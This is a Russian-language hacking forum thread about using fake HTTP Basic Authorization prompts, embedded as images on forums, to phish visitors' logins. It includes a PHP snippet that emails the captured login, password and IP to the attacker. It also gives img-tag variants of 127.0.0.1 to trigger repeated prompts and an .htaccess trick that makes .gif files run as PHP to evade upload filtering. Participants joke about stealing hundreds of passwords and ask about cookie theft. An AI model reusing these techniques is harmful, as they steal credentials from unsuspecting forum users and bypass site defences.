Авторские статьи Применение Basic Authorization против форумов

Discussion in 'Статьи' started by hidden, 25 Jun 2006.

  1. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Code:
    [color=#00AA00][color=#00FF00]mail[/COLOR][color=#0000FF]([/COLOR]
      [/COLOR][color=#FFFF00]'Ваше мыло@ya.ru'[/COLOR][color=#00AA00][color=#0000FF],[/COLOR]
      [/COLOR][color=#FFFF00]'Basic Authorization против форумов'[/COLOR][color=#00AA00][color=#0000FF],[/COLOR]
      [/COLOR][color=#FFFF00]"[color=#00AA00]$login[/COLOR]:[color=#00AA00]$pass[/COLOR][color=#FFFFFF]\n[/COLOR]"[/COLOR][color=#00AA00][color=#0000FF].[/COLOR]
      [/COLOR][color=#FFFF00]'IP: '[/COLOR][color=#00AA00][color=#0000FF].[/COLOR]$_SERVER[color=#0000FF][[/COLOR][/COLOR][color=#FFFF00]'REMOTE_ADDR'[/COLOR][color=#00AA00][color=#0000FF]],[/COLOR]
      [/COLOR][color=#FFFF00]'[email protected]'[/COLOR][color=#00AA00][color=#0000FF],[/COLOR]
      [/COLOR][color=#FFFF00]'Content-Type: text/plain;'[/COLOR][color=#00AA00]
    [color=#0000FF])[/COLOR][color=#FF0000];[/COLOR][/COLOR]
    Хотя в файл сохранять помоему гораздо удобние и быстрее
     
    2 people like this.
  2. Arin

    Arin Elder - Старейшина

    Joined:
    20 Dec 2006
    Messages:
    67
    Likes Received:
    29
    Reputations:
    6
    Cпасибо за нормальный код. :)

    В файл - да, удобнее, но не в этот раз.
     
  3. wils

    wils New Member

    Joined:
    9 Aug 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Ребята, а как же сделать чтоб вылазило 50 таких табличек?????
    Это что нужно 50 таких скриптов делать? =)
     
  4. wils

    wils New Member

    Joined:
    9 Aug 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    и ещё, может ламерский вопрос, но как узнать IP адрес своего сайта, ну типа для www.site.ru будет 85.101.33.201.
     
  5. nerezus

    nerezus Banned

    Joined:
    12 Aug 2004
    Messages:
    3,191
    Likes Received:
    729
    Reputations:
    266
    пропинговать попробуй )
     
  6. wils

    wils New Member

    Joined:
    9 Aug 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    эммммм......=)
    А вот ещё
    Code:
    Ребята, а как же сделать чтоб вылазило 50 таких табличек?????
    Это что нужно 50 таких скриптов делать? =)
    Как тут быть??????
     
  7. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    127.0.0.1, 127.00.0.1, 127.0.00.1, 127.0.0.01 и даже 0177.0.0.1 - эти 5 строк обозначают один и тот-же ip адрес но для браузера это разные хосты, а значит, для каждого из них нужно запросить авторизацию ;) .
     
  8. wils

    wils New Member

    Joined:
    9 Aug 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Простите плизз мою тупость, но если я правельно всё понял, то так:
    <img src="127.0.0.1/img.php">
    <img src="127.00.0.1/img.php">
    <img src="127.0.00.1/img.php">
    <img src="0177.0.0.1/img.php">
     
    #48 wils, 15 Aug 2007
    Last edited: 16 Aug 2007
    1 person likes this.
  9. XenOtai

    XenOtai Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    25
    Likes Received:
    17
    Reputations:
    16
    Хотелось бы поделиться кое-чем. Сегодня встретил фильтрацию по расширению на форуме Invision Power Board(U) v1.3.1 Final, когда хотел разместить этот скрипт. Уже было отчаялся, но вспомнил про htaccess! Создаём на хосте папку, куда кидаем файл с расширением .htaccess со следующим содержанием:

    Code:
    AddType application/x-httpd-php .gif
    Вместо .gif подставляем нужное расширение. Готово! Кидаем скрипт с этим же расширением в ту же папку! Теперь ваш скрипт пройдёт любую фильтрацию по расширению!
     
    1 person likes this.
  10. zl0y

    zl0y Banned

    Joined:
    13 Sep 2006
    Messages:
    371
    Likes Received:
    270
    Reputations:
    109
    hidden Молодец ! Статья ничего,побалываться и увести пару трой сотен паролей сойдет :) НАпример :"Введи пасс егорыч :)....",ну это я пошутил если вы непоняли :)
     
  11. XenOtai

    XenOtai Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    25
    Likes Received:
    17
    Reputations:
    16
    Я вот нашёл такую статью. :) Причём здесь же, на ачате. ;)

    Кому интересно, смотрим тут:

    http://forum.antichat.ru/thread7169.html

    А вот цитата оттуда:

     
    1 person likes this.
  12. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Чтож, значит я был не первый...
     
  13. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Zhigan and hidden like this.
  14. GRAVITY

    GRAVITY New Member

    Joined:
    29 Aug 2007
    Messages:
    6
    Likes Received:
    2
    Reputations:
    1
    Возник вопрос - а можно с помощью GIF-инъекции украсть куки пользователя, посетившего инфицированную страничку ? :confused:
     
  15. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Первый раз слышу. Если ты имеешь ввиду картинку, "написанную" на php, то нет.
     
  16. GRAVITY

    GRAVITY New Member

    Joined:
    29 Aug 2007
    Messages:
    6
    Likes Received:
    2
    Reputations:
    1
    А какие самые простые способы есть перехвата кукинсов ?

    (сори за оффтоп)
     
  17. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    1) Нет такого понятия как "gif-инъекции".
    2) Украсть куки описанным способом нельзя.
     
  18. {iddqd}

    {iddqd} Member

    Joined:
    22 Dec 2011
    Messages:
    170
    Likes Received:
    99
    Reputations:
    2
  19. Turanchocks_

    Turanchocks_ Elder - Старейшина

    Joined:
    11 May 2013
    Messages:
    1,326
    Likes Received:
    3,283
    Reputations:
    17
    Нихуя себе!
     
  20. Zhigan

    Zhigan New Member

    Joined:
    21 Dec 2015
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    Годно